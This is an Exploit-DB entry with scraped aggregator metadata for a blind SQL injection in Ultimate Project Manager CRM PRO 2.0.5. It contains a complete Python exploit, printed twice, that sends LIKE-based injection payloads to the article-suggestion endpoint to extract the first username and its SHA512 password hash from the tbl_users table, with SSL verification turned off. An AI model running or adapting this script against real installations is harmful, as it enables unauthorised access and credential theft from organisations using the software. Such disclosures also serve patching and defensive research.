Ultimate Project Manager CRM PRO Version 2.0.5 - SQLi (Authenticated)
2020-10-20T00:00:00
ID EDB-ID:48912 Type exploitdb Reporter Exploit-DB Modified 2020-10-20T00:00:00
Description
# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage
# Date: 2020-16-09
# Exploit Author: nag0mez
# Vendor Homepage: https://ultimatepro.codexcube.com/
# Version: <= 2.0.5
# Tested on: Kali Linux 2020.2
# The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database.
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
import requests
import sys
# The original vulnerability was found on a server with an invalid SSL certificate,
# which Python could not verify. I added the verify=False parameter to avoid SSL check.
# The lack of verification results in a warning message from Python.
# To get a clean output, we will ignore all warnings.
import warnings
warnings.filterwarnings("ignore")
host = 'https://testurl.test' # Change
url = "{}/frontend/get_article_suggestion/".format(host)
chars = '1234567890abcdefghijklmnopqrstuvwxyz'
hex_chars = 'abcdef1234567890'
def send_payload(payload):
try:
response = requests.post(url, data=payload, verify=False)
content = response.text
length = len(content)
return length
except Exception as e:
print('Cannot connect to host. Exit.')
sys.exit(1)
def get_first_user():
found = True
known = ''
while found:
found = False
for c in chars:
test = known + c
payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)}
length = send_payload(payload)
if length > 2:
found = True
known += c
print(c, end='')
sys.stdout.flush()
break
return known
def get_hash(username):
found = True
known = ''
while found:
found = False
for c in hex_chars:
test = known + c
payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)}
length = send_payload(payload)
if length > 2:
found = True
known += c
print(c, end='')
sys.stdout.flush()
break
return known
if __name__ == '__main__':
print('Exploit started.')
print('Guessing username...')
username = get_first_user()
if username != '':
print('\nUsername found: {}'.format(username))
else:
print('\nCould not get username! Exit.')
sys.exit(1)
print('Guessing password SHA512 hash...')
sha = get_hash(username)
if sha != '':
print('\nHash found: {}'.format(sha))
else:
print('\nCould not get Hash! Exit.')
sys.exit(1)
{"id": "EDB-ID:48912", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Ultimate Project Manager CRM PRO Version 2.0.5 - SQLi (Authenticated)", "description": "", "published": "2020-10-20T00:00:00", "modified": "2020-10-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/48912", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2020-10-20T16:37:10", "viewCount": 523, "enchantments": {"dependencies": {"references": [], "modified": "2020-10-20T16:37:10", "rev": 2}, "score": {"value": 0.6, "vector": "NONE", "modified": "2020-10-20T16:37:10", "rev": 2}, "vulnersScore": 0.6}, "sourceHref": "https://www.exploit-db.com/download/48912", "sourceData": "# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage\r\n# Date: 2020-16-09\r\n# Exploit Author: nag0mez\r\n# Vendor Homepage: https://ultimatepro.codexcube.com/\r\n# Version: <= 2.0.5\r\n# Tested on: Kali Linux 2020.2\r\n\r\n\r\n# The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database.\r\n\r\n#!/usr/bin/env python3\r\n#-*- coding: utf-8 -*-\r\nimport requests\r\nimport sys\r\n\r\n# The original vulnerability was found on a server with an invalid SSL certificate,\r\n# which Python could not verify. I added the verify=False parameter to avoid SSL check.\r\n# The lack of verification results in a warning message from Python.\r\n# To get a clean output, we will ignore all warnings.\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nhost = 'https://testurl.test' # Change\r\nurl = \"{}/frontend/get_article_suggestion/\".format(host)\r\n\r\nchars = '1234567890abcdefghijklmnopqrstuvwxyz'\r\nhex_chars = 'abcdef1234567890'\r\n\r\ndef send_payload(payload):\r\n\ttry:\r\n\t\tresponse = requests.post(url, data=payload, verify=False)\r\n\t\tcontent = response.text\r\n\t\tlength = len(content)\r\n\t\treturn length\r\n\texcept Exception as e:\r\n\t\tprint('Cannot connect to host. Exit.')\r\n\t\tsys.exit(1)\r\n\t\r\n\r\ndef get_first_user():\r\n\tfound = True\r\n\tknown = ''\r\n\r\n\twhile found:\r\n\r\n\t\tfound = False\r\n\t\tfor c in chars:\r\n\t\t\ttest = known + c\r\n\t\t\tpayload = {'search': \"' or (select username from tbl_users limit 1)like'{}%'-- \".format(test)}\r\n\t\t\tlength = send_payload(payload)\r\n\r\n\t\t\tif length > 2:\r\n\t\t\t\tfound = True\r\n\t\t\t\tknown += c\r\n\t\t\t\tprint(c, end='')\r\n\t\t\t\tsys.stdout.flush()\r\n\t\t\t\tbreak\r\n\r\n\treturn known\r\n\r\ndef get_hash(username):\r\n\tfound = True\r\n\tknown = ''\r\n\r\n\twhile found:\r\n\r\n\t\tfound = False\r\n\t\tfor c in hex_chars:\r\n\t\t\ttest = known + c\r\n\t\t\tpayload = {'search': \"' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- \".format(username,test)}\r\n\t\t\tlength = send_payload(payload)\r\n\r\n\t\t\tif length > 2:\r\n\t\t\t\tfound = True\r\n\t\t\t\tknown += c\r\n\t\t\t\tprint(c, end='')\r\n\t\t\t\tsys.stdout.flush()\r\n\t\t\t\tbreak\r\n\r\n\treturn known\r\n\r\n\r\nif __name__ == '__main__':\r\n\tprint('Exploit started.')\r\n\tprint('Guessing username...')\r\n\r\n\tusername = get_first_user()\r\n\r\n\tif username != '':\r\n\t\tprint('\\nUsername found: {}'.format(username))\r\n\telse:\r\n\t\tprint('\\nCould not get username! Exit.')\r\n\t\tsys.exit(1)\r\n\r\n\tprint('Guessing password SHA512 hash...')\r\n\r\n\tsha = get_hash(username)\r\n\r\n\tif sha != '':\r\n\t\tprint('\\nHash found: {}'.format(sha))\r\n\telse:\r\n\t\tprint('\\nCould not get Hash! Exit.')\r\n\t\tsys.exit(1)", "osvdbidlist": []}
